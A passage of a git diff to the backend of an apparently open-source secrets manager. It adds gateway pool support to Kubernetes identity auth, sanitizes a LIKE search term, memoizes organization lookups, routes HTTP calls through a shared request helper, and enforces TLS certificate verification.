- -import { TDbClient } from "@app/db"; -import { TableName } from "@app/db/schemas"; -import { DatabaseError } from "@app/lib/errors"; -import { buildFindFilter, ormify, prependTableNameToFindFilter, selectAllTableCols } from "@app/lib/knex"; - -export type TVaultExternalMigrationConfigDALFactory = ReturnType; - -export const vaultExternalMigrationConfigDALFactory = (db: TDbClient) => { - const orm = ormify(db, TableName.VaultExternalMigrationConfig); - - const findOne = async (filter: { orgId: string; namespace: string }, tx?: Knex) => { - try { - const result = await (tx || db?.replicaNode?.() || db)(TableName.VaultExternalMigrationConfig) - .leftJoin( - TableName.AppConnection, - `${TableName.AppConnection}.id`, - `${TableName.VaultExternalMigrationConfig}.connectionId` - ) - /* eslint-disable @typescript-eslint/no-misused-promises */ - .where(buildFindFilter(prependTableNameToFindFilter(TableName.VaultExternalMigrationConfig, filter))) - .select(selectAllTableCols(TableName.VaultExternalMigrationConfig)) - .select( - db.ref("id").withSchema(TableName.AppConnection).as("appConnectionId"), - db.ref("name").withSchema(TableName.AppConnection).as("appConnectionName"), - db.ref("app").withSchema(TableName.AppConnection).as("appConnectionApp"), - db.ref("encryptedCredentials").withSchema(TableName.AppConnection).as("appConnectionEncryptedCredentials"), - db.ref("orgId").withSchema(TableName.AppConnection).as("appConnectionOrgId"), - db.ref("isAutoRotationEnabled").withSchema(TableName.AppConnection).as("appConnectionIsAutoRotationEnabled"), - db.ref("method").withSchema(TableName.AppConnection).as("appConnectionMethod"), - db.ref("description").withSchema(TableName.AppConnection).as("appConnectionDescription"), - db.ref("version").withSchema(TableName.AppConnection).as("appConnectionVersion"), - db.ref("gatewayId").withSchema(TableName.AppConnection).as("appConnectionGatewayId"), - db.ref("projectId").withSchema(TableName.AppConnection).as("appConnectionProjectId"), - db.ref("createdAt").withSchema(TableName.AppConnection).as("appConnectionCreatedAt"), - db.ref("updatedAt").withSchema(TableName.AppConnection).as("appConnectionUpdatedAt") - ) - .first(); - - if (!result) return undefined; - - return { - ...result, - connection: result.appConnectionId - ? { - id: result.appConnectionId, - name: result.appConnectionName, - app: result.appConnectionApp, - encryptedCredentials: result.appConnectionEncryptedCredentials, - orgId: result.appConnectionOrgId, - method: result.appConnectionMethod, - description: result.appConnectionDescription, - version: result.appConnectionVersion, - gatewayId: result.appConnectionGatewayId, - projectId: result.appConnectionProjectId, - createdAt: result.appConnectionCreatedAt, - updatedAt: result.appConnectionUpdatedAt, - isAutoRotationEnabled: result.appConnectionIsAutoRotationEnabled - } - : undefined - }; - } catch (error) { - throw new DatabaseError({ error, name: "Find one" }); - } - }; - - return { ...orm, findOne }; -}; diff --git a/backend/src/services/folder-commit/folder-commit-dal.ts b/backend/src/services/folder-commit/folder-commit-dal.ts index e95dbb83938..8f900ec81d8 100644 --- a/backend/src/services/folder-commit/folder-commit-dal.ts +++ b/backend/src/services/folder-commit/folder-commit-dal.ts @@ -10,6 +10,7 @@ import { TSecretVersionsV2 } from "@app/db/schemas"; import { DatabaseError, NotFoundError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { buildFindFilter, ormify, selectAllTableCols } from "@app/lib/knex"; export type TFolderCommitDALFactory = ReturnType; @@ -426,7 +427,7 @@ export const folderCommitDALFactory = (db: TDbClient) => { // Add search functionality if (search) { baseQuery = baseQuery.where((qb) => { - void qb.whereILike("message", `%${search}%`); + void qb.whereILike("message", `%${sanitizeSqlLikeString(search)}%`); }); } diff --git a/backend/src/services/group-project/group-project-service.ts b/backend/src/services/group-project/group-project-service.ts index 77497a26cd1..ac914796a54 100644 --- a/backend/src/services/group-project/group-project-service.ts +++ b/backend/src/services/group-project/group-project-service.ts @@ -4,24 +4,17 @@ import { ActionProjectType } from "@app/db/schemas"; import { TListProjectGroupUsersDTO } from "@app/ee/services/group/group-types"; import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { ProjectPermissionGroupActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; -import { NotFoundError } from "@app/lib/errors"; import { TGroupDALFactory } from "../../ee/services/group/group-dal"; -import { TProjectDALFactory } from "../project/project-dal"; type TGroupProjectServiceFactoryDep = { groupDAL: Pick; - projectDAL: Pick; permissionService: Pick; }; export type TGroupProjectServiceFactory = ReturnType; -export const groupProjectServiceFactory = ({ - groupDAL, - projectDAL, - permissionService -}: TGroupProjectServiceFactoryDep) => { +export const groupProjectServiceFactory = ({ groupDAL, permissionService }: TGroupProjectServiceFactoryDep) => { const listProjectGroupUsers = async ({ id, projectId, @@ -35,12 +28,6 @@ export const groupProjectServiceFactory = ({ search, filter }: TListProjectGroupUsersDTO) => { - const project = await projectDAL.findById(projectId); - - if (!project) { - throw new NotFoundError({ message: `Failed to find project with ID ${projectId}` }); - } - const { permission } = await permissionService.getProjectPermission({ actor, actorId, @@ -51,8 +38,10 @@ export const groupProjectServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionGroupActions.Read, ProjectPermissionSub.Groups); + // getProjectPermission above throws NotFoundError if the project doesn't exist and + // guarantees actorOrgId === project.orgId β€” no separate project lookup needed. const { members, totalCount } = await groupDAL.findAllGroupPossibleUsers({ - orgId: project.orgId, + orgId: actorOrgId, groupId: id, offset, limit, diff --git a/backend/src/services/identity-access-token/identity-access-token-dal.ts b/backend/src/services/identity-access-token/identity-access-token-dal.ts index 39ba33f3d53..40a35f60e52 100644 --- a/backend/src/services/identity-access-token/identity-access-token-dal.ts +++ b/backend/src/services/identity-access-token/identity-access-token-dal.ts @@ -92,8 +92,7 @@ export const identityAccessTokenDALFactory = (db: TDbClient) => { // the query, you need to update the indexes accordingly to avoid performance regressions. return dbClient .select("id") - .from(revokedTokensQuery.unionAll(exceededUsageLimitQuery).unionAll(expiredTTLQuery).as("all_expired_tokens")) - .distinct(); + .from(revokedTokensQuery.unionAll(exceededUsageLimitQuery).unionAll(expiredTTLQuery).as("all_expired_tokens")); }; do { diff --git a/backend/src/services/identity-alicloud-auth/identity-alicloud-auth-service.ts b/backend/src/services/identity-alicloud-auth/identity-alicloud-auth-service.ts index f06551a3a50..3d91a60f467 100644 --- a/backend/src/services/identity-alicloud-auth/identity-alicloud-auth-service.ts +++ b/backend/src/services/identity-alicloud-auth/identity-alicloud-auth-service.ts @@ -24,7 +24,9 @@ import { } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { ActorType, AuthTokenType } from "../auth/auth-type"; @@ -83,7 +85,9 @@ export const identityAliCloudAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -537,7 +541,10 @@ export const identityAliCloudAuthServiceFactory = ({ actorOrgId }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, diff --git a/backend/src/services/identity-aws-auth/identity-aws-auth-service.ts b/backend/src/services/identity-aws-auth/identity-aws-auth-service.ts index b77b94be346..fabb3ec7138 100644 --- a/backend/src/services/identity-aws-auth/identity-aws-auth-service.ts +++ b/backend/src/services/identity-aws-auth/identity-aws-auth-service.ts @@ -2,7 +2,6 @@ import { ForbiddenError, subject } from "@casl/ability"; import { requestContext } from "@fastify/request-context"; /* eslint-disable @typescript-eslint/no-unsafe-assignment */ -import axios from "axios"; import RE2 from "re2"; import { AccessScope, ActionProjectType, IdentityAuthMethod, OrganizationActionScope } from "@app/db/schemas"; @@ -15,6 +14,7 @@ import { import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { ProjectPermissionIdentityActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { getConfig } from "@app/lib/config/env"; +import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto"; import { BadRequestError, @@ -25,7 +25,9 @@ import { } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { ActorType, AuthTokenType } from "../auth/auth-type"; @@ -67,7 +69,7 @@ const awsRegionFromHeader = (authorizationHeader: string): string | null => { // SignedHeaders=content-length;content-type;host;x-amz-date, // Signature=fe5f80f77d5fa3beca038a248ff027d0445342fe2855ddc963176630326f1024 // - // The credential is in the form of "////aws4_request" + // The credential is in the form of "////aws4_request"xi try { const fields = authorizationHeader.split(" "); for (const field of fields) { @@ -121,7 +123,9 @@ export const identityAwsAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -146,7 +150,7 @@ export const identityAwsAuthServiceFactory = ({ GetCallerIdentityResult: { Account, Arn, UserId } } } - }: { data: TGetCallerIdentityResponse } = await axios({ + }: { data: TGetCallerIdentityResponse } = await request({ method: iamHttpRequestMethod, url, headers, @@ -642,7 +646,10 @@ export const identityAwsAuthServiceFactory = ({ actorOrgId }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, diff --git a/backend/src/services/identity-azure-auth/identity-azure-auth-fns.ts b/backend/src/services/identity-azure-auth/identity-azure-auth-fns.ts index cb06f3d4058..636b6d92e4c 100644 --- a/backend/src/services/identity-azure-auth/identity-azure-auth-fns.ts +++ b/backend/src/services/identity-azure-auth/identity-azure-auth-fns.ts @@ -1,5 +1,4 @@ -import axios from "axios"; - +import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto"; import { UnauthorizedError } from "@app/lib/errors"; @@ -20,7 +19,7 @@ export const validateAzureIdentity = async ({ const { kid } = decodedJwt.header; - const { data }: { data: TAzureJwksUriResponse } = await axios.get(jwksUri); + const { data }: { data: TAzureJwksUriResponse } = await request.get(jwksUri); const signingKeys = data.keys; const signingKey = signingKeys.find((key) => key.kid === kid); diff --git a/backend/src/services/identity-azure-auth/identity-azure-auth-service.ts b/backend/src/services/identity-azure-auth/identity-azure-auth-service.ts index 03acd0f43a6..90e4c36bade 100644 --- a/backend/src/services/identity-azure-auth/identity-azure-auth-service.ts +++ b/backend/src/services/identity-azure-auth/identity-azure-auth-service.ts @@ -20,7 +20,9 @@ import { UnauthorizedError } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { ActorType, AuthTokenType } from "../auth/auth-type"; @@ -77,7 +79,9 @@ export const identityAzureAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -543,7 +547,10 @@ export const identityAzureAuthServiceFactory = ({ actorAuthMethod, actorOrgId }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, diff --git a/backend/src/services/identity-gcp-auth/identity-gcp-auth-fns.ts b/backend/src/services/identity-gcp-auth/identity-gcp-auth-fns.ts index 958a54e0ab5..48641586088 100644 --- a/backend/src/services/identity-gcp-auth/identity-gcp-auth-fns.ts +++ b/backend/src/services/identity-gcp-auth/identity-gcp-auth-fns.ts @@ -1,7 +1,7 @@ -import axios from "axios"; import { OAuth2Client } from "google-auth-library"; import RE2 from "re2"; +import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto"; import { UnauthorizedError } from "@app/lib/errors"; @@ -64,7 +64,7 @@ export const validateIamIdentity = async ({ data: { [key: string]: string; }; - } = await axios.get(`https://www.googleapis.com/service_accounts/v1/metadata/x509/${encodeURIComponent(sub)}`); + } = await request.get(`https://www.googleapis.com/service_accounts/v1/metadata/x509/${encodeURIComponent(sub)}`); const publicKey = data[decodedJwt.header.kid]; diff --git a/backend/src/services/identity-gcp-auth/identity-gcp-auth-service.ts b/backend/src/services/identity-gcp-auth/identity-gcp-auth-service.ts index ea816577972..d30176cbd66 100644 --- a/backend/src/services/identity-gcp-auth/identity-gcp-auth-service.ts +++ b/backend/src/services/identity-gcp-auth/identity-gcp-auth-service.ts @@ -20,7 +20,9 @@ import { UnauthorizedError } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { ActorType, AuthTokenType } from "../auth/auth-type"; @@ -75,7 +77,9 @@ export const identityGcpAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -591,7 +595,10 @@ export const identityGcpAuthServiceFactory = ({ actorAuthMethod, actorOrgId }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, diff --git a/backend/src/services/identity-jwt-auth/identity-jwt-auth-service.ts b/backend/src/services/identity-jwt-auth/identity-jwt-auth-service.ts index 7ac6363fee4..69ddbedde7e 100644 --- a/backend/src/services/identity-jwt-auth/identity-jwt-auth-service.ts +++ b/backend/src/services/identity-jwt-auth/identity-jwt-auth-service.ts @@ -29,7 +29,9 @@ import { UnauthorizedError } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { getValueByDot } from "@app/lib/template/dot-access"; import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; @@ -90,7 +92,9 @@ export const identityJwtAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -126,7 +130,9 @@ export const identityJwtAuthServiceFactory = ({ cipherTextBlob: identityJwtAuth.encryptedJwksCaCert }).toString(); - const requestAgent = new https.Agent({ ca: decryptedJwksCaCert, rejectUnauthorized: !!decryptedJwksCaCert }); + const requestAgent = decryptedJwksCaCert + ? new https.Agent({ ca: decryptedJwksCaCert, rejectUnauthorized: true }) + : undefined; client = new JwksClient({ jwksUri: identityJwtAuth.jwksUrl, requestAgent @@ -790,7 +796,10 @@ export const identityJwtAuthServiceFactory = ({ actorOrgId }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, diff --git a/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-dal.ts b/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-dal.ts index f1ba2e1dff0..ef1149a9096 100644 --- a/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-dal.ts +++ b/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-dal.ts @@ -31,5 +31,27 @@ export const identityKubernetesAuthDALFactory = (db: TDbClient) => { return parseInt(String(result?.count || "0"), 10); }; - return { ...kubernetesAuthOrm, findByGatewayId, countByGatewayId }; + const findByGatewayPoolId = async (gatewayPoolId: string, tx?: Knex) => { + const docs = await (tx || db.replicaNode())(TableName.IdentityKubernetesAuth) + .leftJoin(TableName.Identity, `${TableName.IdentityKubernetesAuth}.identityId`, `${TableName.Identity}.id`) + .where(`${TableName.IdentityKubernetesAuth}.gatewayPoolId`, gatewayPoolId) + .select( + db.ref("id").withSchema(TableName.IdentityKubernetesAuth), + db.ref("identityId").withSchema(TableName.IdentityKubernetesAuth), + db.ref("name").withSchema(TableName.Identity).as("identityName") + ); + + return docs; + }; + + const countByGatewayPoolId = async (gatewayPoolId: string, tx?: Knex) => { + const result = await (tx || db.replicaNode())(TableName.IdentityKubernetesAuth) + .where(`${TableName.IdentityKubernetesAuth}.gatewayPoolId`, gatewayPoolId) + .count("id") + .first(); + + return parseInt(String(result?.count || "0"), 10); + }; + + return { ...kubernetesAuthOrm, findByGatewayId, countByGatewayId, findByGatewayPoolId, countByGatewayPoolId }; }; diff --git a/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-service.ts b/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-service.ts index dac0274e09d..f249a3fafe4 100644 --- a/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-service.ts +++ b/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-service.ts @@ -1,6 +1,6 @@ import { ForbiddenError, subject } from "@casl/ability"; import { requestContext } from "@fastify/request-context"; -import axios, { AxiosError, AxiosRequestConfig, AxiosResponse } from "axios"; +import { AxiosError, AxiosRequestConfig, AxiosResponse } from "axios"; import https from "https"; import picomatch from "picomatch"; import RE2 from "re2"; @@ -14,11 +14,14 @@ import { } from "@app/db/schemas"; import { TGatewayDALFactory } from "@app/ee/services/gateway/gateway-dal"; import { TGatewayServiceFactory } from "@app/ee/services/gateway/gateway-service"; +import { TGatewayPoolDALFactory } from "@app/ee/services/gateway-pool/gateway-pool-dal"; +import { TGatewayPoolServiceFactory } from "@app/ee/services/gateway-pool/gateway-pool-service"; import { TGatewayV2DALFactory } from "@app/ee/services/gateway-v2/gateway-v2-dal"; import { TGatewayV2ServiceFactory } from "@app/ee/services/gateway-v2/gateway-v2-service"; import { TLicenseServiceFactory } from "@app/ee/services/license/license-service"; import { OrgPermissionGatewayActions, + OrgPermissionGatewayPoolActions, OrgPermissionIdentityActions, OrgPermissionSubjects } from "@app/ee/services/permission/org-permission"; @@ -42,7 +45,9 @@ import { GatewayHttpProxyActions, GatewayProxyProtocol, withGatewayProxy } from import { withGatewayV2Proxy } from "@app/lib/gateway-v2/gateway-v2"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { ActorType, AuthTokenType } from "../auth/auth-type"; @@ -87,6 +92,11 @@ type TIdentityKubernetesAuthServiceFactoryDep = { gatewayV2Service: TGatewayV2ServiceFactory; gatewayDAL: Pick; gatewayV2DAL: Pick; + gatewayPoolService: Pick< + TGatewayPoolServiceFactory, + "getPlatformConnectionDetailsByPoolId" | "pickRandomHealthyGateway" + >; + gatewayPoolDAL: Pick; orgDAL: Pick; }; @@ -106,11 +116,14 @@ export const identityKubernetesAuthServiceFactory = ({ gatewayDAL, gatewayV2DAL, kmsService, + gatewayPoolService, + gatewayPoolDAL, orgDAL }: TIdentityKubernetesAuthServiceFactoryDep) => { const $gatewayProxyWrapper = async ( inputs: { - gatewayId: string; + gatewayId?: string; + gatewayPoolId?: string; targetHost?: string; targetPort?: number; caCert?: string; @@ -118,18 +131,25 @@ export const identityKubernetesAuthServiceFactory = ({ }, gatewayCallback: (host: string, port: number, httpsAgent?: https.Agent) => Promise ): Promise => { - const gatewayV2ConnectionDetails = await gatewayV2Service.getPlatformConnectionDetailsByGatewayId({ - gatewayId: inputs.gatewayId, - targetHost: inputs.targetHost ?? GATEWAY_AUTH_DEFAULT_HOST, - targetPort: inputs.targetPort ?? 443 - }); + const gatewayV2ConnectionDetails = inputs.gatewayPoolId + ? await gatewayPoolService.getPlatformConnectionDetailsByPoolId({ + poolId: inputs.gatewayPoolId, + targetHost: inputs.targetHost ?? GATEWAY_AUTH_DEFAULT_HOST, + targetPort: inputs.targetPort ?? 443 + }) + : await gatewayV2Service.getPlatformConnectionDetailsByGatewayId({ + gatewayId: inputs.gatewayId!, + targetHost: inputs.targetHost ?? GATEWAY_AUTH_DEFAULT_HOST, + targetPort: inputs.targetPort ?? 443 + }); if (gatewayV2ConnectionDetails) { let httpsAgent: https.Agent | undefined; if (!inputs.reviewTokenThroughGateway) { httpsAgent = new https.Agent({ - ca: inputs.caCert, - rejectUnauthorized: Boolean(inputs.caCert) + ca: inputs.caCert || undefined, + rejectUnauthorized: true, + servername: inputs.targetHost }); } @@ -154,7 +174,7 @@ export const identityKubernetesAuthServiceFactory = ({ return callbackResult; } - const relayDetails = await gatewayService.fnGetGatewayClientTlsByGatewayId(inputs.gatewayId); + const relayDetails = await gatewayService.fnGetGatewayClientTlsByGatewayId(inputs.gatewayId!); const callbackResult = await withGatewayProxy( async (port, httpsAgent) => { @@ -174,8 +194,9 @@ export const identityKubernetesAuthServiceFactory = ({ ...(!inputs.reviewTokenThroughGateway ? { httpsAgent: new https.Agent({ - ca: inputs.caCert, - rejectUnauthorized: Boolean(inputs.caCert) + ca: inputs.caCert || undefined, + rejectUnauthorized: true, + servername: inputs.targetHost }) } : {}) @@ -264,7 +285,9 @@ export const identityKubernetesAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -313,7 +336,7 @@ export const identityKubernetesAuthServiceFactory = ({ const baseUrl = port ? `${host}:${port}` : host; - const res = await axios + const res = await request .post( `${baseUrl}/apis/authentication.k8s.io/v1/tokenreviews`, { @@ -334,8 +357,8 @@ export const identityKubernetesAuthServiceFactory = ({ signal: AbortSignal.timeout(10000), timeout: 10000, httpsAgent: new https.Agent({ - ca: caCert, - rejectUnauthorized: Boolean(caCert), + ca: caCert || undefined, + rejectUnauthorized: true, servername }) } @@ -388,7 +411,7 @@ export const identityKubernetesAuthServiceFactory = ({ "tokenReviewCallbackThroughGateway: Processing kubernetes token review using gateway" ); - const res = await axios + const res = await request .post( `${host}:${port}/apis/authentication.k8s.io/v1/tokenreviews`, { @@ -437,15 +460,22 @@ export const identityKubernetesAuthServiceFactory = ({ let data: TCreateTokenReviewResponse | undefined; if (identityKubernetesAuth.tokenReviewMode === IdentityKubernetesAuthTokenReviewMode.Gateway) { - if (!identityKubernetesAuth.gatewayId && !identityKubernetesAuth.gatewayV2Id) { + if ( + !identityKubernetesAuth.gatewayId && + !identityKubernetesAuth.gatewayV2Id && + !identityKubernetesAuth.gatewayPoolId + ) { throw new BadRequestError({ - message: "Gateway ID is required when token review mode is set to Gateway" + message: "Gateway or Gateway Pool is required when token review mode is set to Gateway" }); } data = await $gatewayProxyWrapper( { - gatewayId: (identityKubernetesAuth.gatewayV2Id ?? identityKubernetesAuth.gatewayId) as string, + gatewayId: identityKubernetesAuth.gatewayPoolId + ? undefined + : ((identityKubernetesAuth.gatewayV2Id ?? identityKubernetesAuth.gatewayId) as string), + gatewayPoolId: identityKubernetesAuth.gatewayPoolId ?? undefined, reviewTokenThroughGateway: true }, tokenReviewCallbackThroughGateway @@ -464,18 +494,25 @@ export const identityKubernetesAuthServiceFactory = ({ const [k8sHost, k8sPort] = kubernetesHost.split(":"); - data = - identityKubernetesAuth.gatewayId || identityKubernetesAuth.gatewayV2Id - ? await $gatewayProxyWrapper( - { - gatewayId: (identityKubernetesAuth.gatewayV2Id ?? identityKubernetesAuth.gatewayId) as string, - targetHost: k8sHost, - targetPort: k8sPort ? Number(k8sPort) : 443, - reviewTokenThroughGateway: false - }, - tokenReviewCallbackRaw - ) - : await tokenReviewCallbackRaw(); + const hasGateway = + identityKubernetesAuth.gatewayId || + identityKubernetesAuth.gatewayV2Id || + identityKubernetesAuth.gatewayPoolId; + + data = hasGateway + ? await $gatewayProxyWrapper( + { + gatewayId: identityKubernetesAuth.gatewayPoolId + ? undefined + : ((identityKubernetesAuth.gatewayV2Id ?? identityKubernetesAuth.gatewayId) as string), + gatewayPoolId: identityKubernetesAuth.gatewayPoolId ?? undefined, + targetHost: k8sHost, + targetPort: k8sPort ? Number(k8sPort) : 443, + reviewTokenThroughGateway: false + }, + tokenReviewCallbackRaw + ) + : await tokenReviewCallbackRaw(); } else { throw new BadRequestError({ message: `Invalid token review mode: ${identityKubernetesAuth.tokenReviewMode}` @@ -705,6 +742,7 @@ export const identityKubernetesAuthServiceFactory = ({ const attachKubernetesAuth = async ({ identityId, gatewayId, + gatewayPoolId, kubernetesHost, caCert, tokenReviewerJwt, @@ -843,6 +881,47 @@ export const identityKubernetesAuthServiceFactory = ({ await validateTokenReviewerPermissions({ gatewayExecutor, tokenReviewerJwt }); } } + } else if (gatewayPoolId) { + if (!plan.gatewayPool) { + throw new BadRequestError({ + message: "Your current plan does not support gateway pools. Please upgrade to an Enterprise plan." + }); + } + + const { permission: orgPermission } = await permissionService.getOrgPermission({ + scope: OrganizationActionScope.Any, + actor, + actorId, + orgId: identityMembershipOrg.scopeOrgId, + actorAuthMethod, + actorOrgId + }); + ForbiddenError.from(orgPermission).throwUnlessCan( + OrgPermissionGatewayPoolActions.AttachGatewayPools, + OrgPermissionSubjects.GatewayPool + ); + + const pool = await gatewayPoolDAL.findById(gatewayPoolId); + if (!pool || pool.orgId !== identityMembershipOrg.scopeOrgId) { + throw new NotFoundError({ message: `Gateway pool with ID ${gatewayPoolId} not found` }); + } + + // Validate connectivity through a random healthy pool member + const validationGateway = await gatewayPoolService.pickRandomHealthyGateway(gatewayPoolId); + if (tokenReviewMode === IdentityKubernetesAuthTokenReviewMode.Gateway) { + const gatewayExecutor = $createGatewayValidationRequest(validationGateway.id); + await validateKubernetesHostConnectivity({ gatewayExecutor }); + await validateTokenReviewerPermissions({ gatewayExecutor }); + } else if (tokenReviewMode === IdentityKubernetesAuthTokenReviewMode.Api && kubernetesHost) { + const gatewayExecutor = $createGatewayValidationRequest(validationGateway.id, { + kubernetesHost, + caCert: caCert || undefined + }); + await validateKubernetesHostConnectivity({ gatewayExecutor }); + if (tokenReviewerJwt) { + await validateTokenReviewerPermissions({ gatewayExecutor, tokenReviewerJwt }); + } + } } else if (tokenReviewMode === IdentityKubernetesAuthTokenReviewMode.Api && kubernetesHost) { logger.info({ kubernetesHost }, "Validating Kubernetes host connectivity for new auth method"); await validateKubernetesHostConnectivity({ @@ -865,6 +944,16 @@ export const identityKubernetesAuthServiceFactory = ({ orgId: identityMembershipOrg.scopeOrgId }); + let resolvedGatewayId: string 